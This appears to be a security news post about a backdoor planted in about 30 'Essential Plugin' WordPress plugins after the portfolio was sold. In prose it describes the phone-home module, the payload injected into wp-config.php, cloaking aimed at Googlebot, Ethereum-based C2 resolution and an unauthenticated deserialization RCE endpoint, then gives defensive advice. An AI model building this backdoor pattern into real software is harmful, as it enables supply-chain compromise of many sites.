Someone bought 30 WordPress plugins and planted a backdoor in all of them

April 13, 2026
aisecuritybusinessstreaming
Close-up of a modern laptop keyboard with a backlit display, emphasizing sleek design.
Photo by Szymon Shields on Pexels

What happened

A trusted WordPress plugin portfolio was weaponized. It has been reported that more than 30 plugins from the “Essential Plugin” family were compromised after a change of ownership, and the WordPress.org Plugins Team closed 31 plugins after discoveries. The trigger was an alert in a client wp-admin dashboard for Countdown Timer Ultimate — a simple security notice that led to a full audit and the discovery of a backdoor hiding in wp-config.php. Trust, destroyed in one update. Ouch.

How the malware worked

The malicious module, wpos-analytics, allegedly phoned home to analytics.essentialplugin.com and downloaded a file masquerading as wp-comments-post.php (named wp-comments-posts.php). That file injected a large PHP payload into wp-config.php which served SEO spam and redirects only to Googlebot — invisible to site owners and users. The campaign was clever: the backdoor resolved its command-and-control domain via an Ethereum smart contract, so takedowns of ordinary DNS or hosting wouldn’t be enough. WordPress.org pushed a forced plugin update (v2.6.9.1) that neutralized the phone-home code, but the injected wp-config.php remained intact and active.

The forensic timeline

Backup forensics pinpointed the injection to a tight window on April 6, 2026, between 04:22 and 11:06 UTC. The malicious payload had been planted roughly eight months earlier but stood dormant until activation. The change that introduced the backdoor arrived in version 2.6.7 (Aug 8, 2025): 191 lines added, including a file_get_contents() plus @unserialize() chain, a dynamic execution path that runs an attacker-controlled function, and an unauthenticated REST endpoint (permission_callback: __return_true). In plain English: an attacker-controlled payload could call arbitrary PHP functions with attacker-chosen arguments. That’s textbook remote code execution via deserialization.

Sale, scale and what it means

The original plugins were built by a team known as WP Online Support (later Essential Plugin). Facing falling revenue, the portfolio was listed on Flippa and it has been reported that a buyer paid six figures for the lot. Whether that buyer is the attacker, or the account was itself hijacked, remains under investigation — but the result is the same: a supply-chain compromise that reached thousands of sites. The emotional sting here is clear — site owners expect plugins to be safe. Lessons? Check wp-config.php for unexpected code, audit plugin ownership changes, restore clean backups dated before the April 6 window, and treat third-party plugin portfolios as high-value attack surfaces. Who’s watching the watchers? Turns out we all should be.

Sources: anchor.host, Hacker News